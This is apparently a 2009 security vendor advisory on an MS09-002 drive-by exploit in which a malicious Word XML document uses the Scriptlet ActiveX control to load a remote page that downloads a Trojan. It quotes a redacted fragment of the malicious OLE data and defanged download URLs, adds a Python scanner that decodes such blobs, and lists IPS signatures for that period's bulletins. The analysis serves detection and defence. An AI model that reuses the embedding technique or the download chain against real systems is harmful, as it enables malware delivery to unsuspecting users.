
MS09-002 Exploit (Feb 18, 2009)

SonicWALL UTM Research Team has observed a new MS09-002 exploit being used in the wild in drive-by attacks.

This exploit involves a malicious Microsoft Word document in XML format, delivered to the end user with a .doc extension. The file is 3,871 bytes in size and attempts to exploit the Uninitialized Memory Corruption vulnerability (CVE-2009-0075) in Internet Explorer 7, which Microsoft patched in the MS09-002 release.

The malicious Word document contains the following specially crafted data bytes:

w:ocx w_data="DATA:application/x-oleobject;BASE64,rv0krsYD0RGLdgCAx0TziQAAOAAAAGgAdAB0AHA (REMOVED) gAZQBuAGcAagBp AHQAagAuAGMAbwBtAC8AYgBiAHMALwBpAG0AYQBnAGUAcwA vAGEAbABpAHAAYQB5AC8AbQBtAC8A agBjAC8AagBjAC4AaAB0AG0AbAA= " w_id="DefaultOcxName" w_name="DefaultOcxName" w_classid="CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389" w_w="200" w_h="123" wx_iPersistPropertyBag="true"

When the end user opens the document, it uses the Microsoft Scriptlet Component ActiveX control (CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389) to connect to the following malicious URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.html [detected as GAV: XMLhttpd.D (Exploit)]

The jc.html file contains obfuscated JavaScript code that in turn downloads a Trojan from the following URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.exe [detected as GAV: Rincux_4 (Trojan)]

The exploit has very low detection and is also known as Exploit-MSWord.k trojan (McAfee). SonicWALL GAV detects this exploit as GAV: MSWord.K (Exploit).
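As an added example (not SonicWALL's code and not the sample itself), the following Python decodes the DATA:application/x-oleobject blob carried by a w:ocx element as shown above: the base64 stream starts with the control's CLSID as a 16-byte little-endian GUID (the post's blob begins with rv0krsYD0RGLdgCAx0TziQ, which decodes to exactly AE24FDAE-03C6-11D1-8B76-0080C744F389), and any UTF-16LE strings that follow are extracted as candidate URLs for triage. The WordML namespace, the w:data/w:classid attribute names, and the sample document are assumptions; the URL in the sample is a constructed placeholder.

```python
import base64
import re
import uuid
import xml.etree.ElementTree as ET

# Assumed Word 2003 XML (WordML) namespace; CLSID of the Scriptlet Component from the post.
WORDML_NS = "http://schemas.microsoft.com/office/word/2003/wordml"
SCRIPTLET_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"

# Runs of 8+ printable ASCII characters encoded as UTF-16LE (each char followed by 0x00).
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")


def decode_oleobject_data(value):
    """Decode a DATA:application/x-oleobject;BASE64,... attribute.

    Returns (clsid, strings). The first 16 bytes are the control CLSID in
    little-endian GUID layout; the remainder is control-specific property data
    that is only scanned for UTF-16LE strings (no fixed layout is assumed).
    """
    head, _, b64 = value.partition(",")
    if not head.lower().startswith("data:application/x-oleobject"):
        raise ValueError("not an x-oleobject DATA URL")
    raw = base64.b64decode(b64.strip())
    clsid = str(uuid.UUID(bytes_le=raw[:16])).upper()
    strings = [m.group(0).decode("utf-16-le") for m in UTF16_RUN.finditer(raw[16:])]
    return clsid, strings


def scan_wordml(xml_text):
    """One finding per <w:ocx> that declares or embeds the Scriptlet Component CLSID."""
    findings = []
    for ocx in ET.fromstring(xml_text).iter(f"{{{WORDML_NS}}}ocx"):
        declared = ocx.get(f"{{{WORDML_NS}}}classid", "")
        clsid, strings = decode_oleobject_data(ocx.get(f"{{{WORDML_NS}}}data", ""))
        if clsid == SCRIPTLET_CLSID or SCRIPTLET_CLSID in declared.upper():
            findings.append({"declared": declared, "embedded_clsid": clsid,
                             "urls": [s for s in strings if s.lower().startswith("http")]})
    return findings


def build_sample(url):
    """Constructed WordML document (not the live sample): CLSID, 6 filler bytes, UTF-16LE URL."""
    blob = uuid.UUID(SCRIPTLET_CLSID).bytes_le + b"\x00" * 6 + url.encode("utf-16-le") + b"\x00\x00"
    b64 = base64.b64encode(blob).decode()
    return (f'<w:wordDocument xmlns:w="{WORDML_NS}"><w:body><w:p><w:r>'
            f'<w:ocx w:data="DATA:application/x-oleobject;BASE64,{b64}" '
            f'w:classid="CLSID:{SCRIPTLET_CLSID}" w:id="DefaultOcxName"/>'
            "</w:r></w:p></w:body></w:wordDocument>")


if __name__ == "__main__":
    print(scan_wordml(build_sample("http://example.invalid/bbs/images/alipay/mm/jc/jc.html")))
```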

Microsoft Security Bulletin Coverage (Feb 13, 2009)

During the first 2 months of 2009 Microsoft has published 5 security bulletins. Among them, MS09-001, MS09-003 and MS09-004 address vulnerabilities on the server side, while MS09-002 and MS09-005 address vulnerabilities on the client side. The SonicWALL UTM team has analyzed each security bulletin and released IPS signatures that detect and prevent potential attacks leveraging these vulnerabilities. Below is a summary of the security bulletins and the corresponding SonicWALL signatures.

MS09-001 Vulnerabilities in SMB Could Allow Remote Code Execution

  • IPS Sid 5357 — NETBIOS MS SMB TRANS Request Error Handling Memory Corruption PoC (MS09-001)
    CVE-2008-4834
  • IPS Sid 5358 — NETBIOS MS SMB OPEN2 Request Error Handling Memory Corruption PoC (MS09-001)
    CVE-2008-4835

MS09-002 Cumulative Security Update for Internet Explorer

  • IPS Sid 5379 — WEB-CLIENT MS IE Cloned Object Memory Corruption Attempt (MS09-002)
    CVE-2009-0075
  • IPS Sid 5387 — WEB-CLIENT MS IE CSS Processing Memory Corruption PoC (MS09-002)
    CVE-2009-0076

MS09-003 Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution

  • IPS Sid 5383 — DOS MS Exchange System Attendant DoS
    CVE-2009-0099
  • IPS Sid 5385 — SMTP MS Exchange TNEF Integer Underflow PoC (MS09-003)
    CVE-2009-0098

MS09-004 Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution

  • IPS Sid 1286 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (Unicode)
    CVE-2008-5416
  • IPS Sid 1292 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (ASCII)
    CVE-2008-5416
  • IPS Sid 1358 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (Unicode-SMB)
    CVE-2008-5416
  • IPS Sid 1360 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (ASCII-SMB)
    CVE-2008-5416

MS09-005 Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution

  • IPS Sid 5384 — MISC MS Visio Object ID Table Memory Corruption PoC (MS09-005)
    CVE-2009-0097
  • IPS Sid 5386 — MISC MS Visio Invalid Tag Handling Memory Corruption PoC (MS09-005)
    CVE-2009-0096
  • IPS Sid 5389 — MS Visio VSD File Icon Bits Memory Corruption PoC (MS09-005)
    CVE-2009-0096

Besides enabling prevention for these signatures, customers are advised to run Windows Update and get the latest patches from Microsoft in order to maximize protection against potential exploits.